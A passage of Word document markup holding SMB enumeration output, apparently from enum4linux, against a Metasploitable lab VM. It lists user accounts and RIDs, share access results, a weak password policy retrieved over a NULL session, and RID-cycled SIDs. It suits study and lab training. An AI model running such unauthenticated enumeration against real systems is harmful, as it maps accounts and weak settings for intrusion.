        <w:t xml:space="preserve">Name: (null)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x1d RID: 0xbbc acb: 0x00000011 Account: service</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: ,,,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x1e RID: 0x434 acb: 0x00000011 Account: list</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: Mailing List Manager</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x1f RID: 0x436 acb: 0x00000011 Account: irc</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: ircd</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x20 RID: 0x4be acb: 0x00000011 Account: ftp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: (null)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x21 RID: 0x4c4 acb: 0x00000011 Account: tomcat55</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: (null)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x22 RID: 0x3f0 acb: 0x00000011 Account: sync</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: sync</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x23 RID: 0x3fc acb: 0x00000011 Account: uucp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: uucp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[games] rid:[0x3f2]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[nobody] rid:[0x1f5]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[bind] rid:[0x4ba]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[proxy] rid:[0x402]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[syslog] rid:[0x4b4]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[user] rid:[0xbba]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[www-data] rid:[0x42a]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[root] rid:[0x3e8]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[news] rid:[0x3fa]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[postgres] rid:[0x4c0]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[bin] rid:[0x3ec]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[mail] rid:[0x3f8]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[distccd] rid:[0x4c6]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[proftpd] rid:[0x4ca]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[dhcp] rid:[0x4b2]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[daemon] rid:[0x3ea]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[sshd] rid:[0x4b8]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[man] rid:[0x3f4]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[lp] rid:[0x3f6]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[mysql] rid:[0x4c2]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[gnats] rid:[0x43a]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[libuuid] rid:[0x4b0]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[backup] rid:[0x42c]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[msfadmin] rid:[0xbb8]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[telnetd] rid:[0x4c8]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[sys] rid:[0x3ee]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[klog] rid:[0x4b6]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[postfix] rid:[0x4bc]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[service] rid:[0xbbc]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[list] rid:[0x434]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[irc] rid:[0x436]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[ftp] rid:[0x4be]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[tomcat55] rid:[0x4c4]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[sync] rid:[0x3f0]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[uucp] rid:[0x3fc]</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ===================================== </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    Share Enumeration on 10.0.2.4    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ===================================== </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">WARNING: The "syslog" option is deprecated</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">Sharename       Type      Comment</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">---------       ----      -------</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">print$          Disk      Printer Drivers</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">tmp             Disk      oh noes!</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">opt             Disk      </w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">Server               Comment</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">---------            -------</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">METASPLOITABLE       metasploitable server (Samba 3.0.20-Debian)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">Workgroup            Master</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">---------            -------</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">WORKGROUP            METASPLOITABLE</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Attempting to map shares on 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">//10.0.2.4/print$</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Mapping: DENIED, Listing: N/A</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">//10.0.2.4/tmp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Mapping: OK, Listing: OK</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">//10.0.2.4/opt</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Mapping: DENIED, Listing: N/A</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">//10.0.2.4/IPC$</w:t>
        <w:tab/>
        <w:t xml:space="preserve">[E] Can't understand response:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">WARNING: The "syslog" option is deprecated</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">NT_STATUS_NETWORK_ACCESS_DENIED listing \*</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">//10.0.2.4/ADMIN$</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Mapping: DENIED, Listing: N/A</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ================================================ </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    Password Policy Information for 10.0.2.4    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ================================================ </w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Attaching to 10.0.2.4 using a NULL share</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Trying protocol 445/SMB...</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Found domain(s):</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">[+] METASPLOITABLE</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Builtin</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Password Info for Domain: METASPLOITABLE</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Minimum password length: 5</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Password history length: None</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Maximum password age: Not Set</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Password Complexity Flags: 000000</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Domain Refuse Password Change: 0</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Domain Password Store Cleartext: 0</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Domain Password Lockout Admins: 0</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Domain Password No Clear Change: 0</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Domain Password No Anon Change: 0</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Domain Password Complex: 0</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Minimum password age: None</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Reset Account Lockout Counter: 30 minutes</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Locked Account Duration: 30 minutes</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Account Lockout Threshold: None</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">[+] Forced Log off Time: Not Set</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Retieved partial password policy with rpcclient:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Password Complexity: Disabled</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Minimum Password Length: 0</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ========================== </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    Groups on 10.0.2.4    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ========================== </w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Getting builtin groups:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Getting builtin group memberships:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Getting local groups:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Getting local group memberships:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Getting domain groups:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Getting domain group memberships:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> =================================================================== </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    Users on 10.0.2.4 via RID cycling (RIDS: 500-550,1000-1050)    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> =================================================================== </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[I] Found new SID: S-1-5-21-1042354039-2475377354-766472396</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Enumerating users using SID S-1-5-21-1042354039-2475377354-766472396 and logon username '', password ''</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-500 METASPLOITABLE\Administrator (Local User)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-501 METASPLOITABLE\nobody (Local User)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-502 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-503 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-504 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-505 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-506 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-507 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-508 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-509 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-510 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-511 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-512 METASPLOITABLE\Domain Admins (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-513 METASPLOITABLE\Domain Users (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-514 METASPLOITABLE\Domain Guests (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-515 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-516 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-517 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-518 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-519 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-520 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-521 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-522 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-523 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-524 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-525 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-526 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-527 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-528 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-529 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-530 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-531 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-532 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-533 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-534 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-535 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-536 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-537 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-538 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-539 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-540 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-541 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-542 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-543 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-544 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-545 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-546 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-547 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-548 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-549 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-550 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1000 METASPLOITABLE\root (Local User)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1001 METASPLOITABLE\root (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1002 METASPLOITABLE\daemon (Local User)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1003 METASPLOITABLE\daemon (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1004 METASPLOITABLE\bin (Local User)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1005 METASPLOITABLE\bin (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1006 METASPLOITABLE\sys (Local User)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1007 METASPLOITABLE\sys (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1008 METASPLOITABLE\sync (Local User)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1009 METASPLOITABLE\adm (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1010 METASPLOITABLE\games (Local User)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1011 METASPLOITABLE\tty (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1012 METASPLOITABLE\man (Local User)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1013 METASPLOITABLE\disk (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1014 METASPLOITABLE\lp (Local User)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1015 METASPLOITABLE\lp (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1016 METASPLOITABLE\mail (Local User)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1017 METASPLOITABLE\mail (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1018 METASPLOITABLE\news (Local User)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1019 METASPLOITABLE\news (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1020 METASPLOITABLE\uucp (Local User)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1021 METASPLOITABLE\uucp (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1022 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1023 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1024 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1025 METASPLOITABLE\man (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1026 METASPLOITABLE\proxy (Local User)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1027 METASPLOITABLE\proxy (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1028 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1029 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1030 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1031 METASPLOITABLE\kmem (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1032 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1033 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1034 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1035 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1036 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1037 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1038 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1039 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1040 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1041 METASPLOITABLE\dialout (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
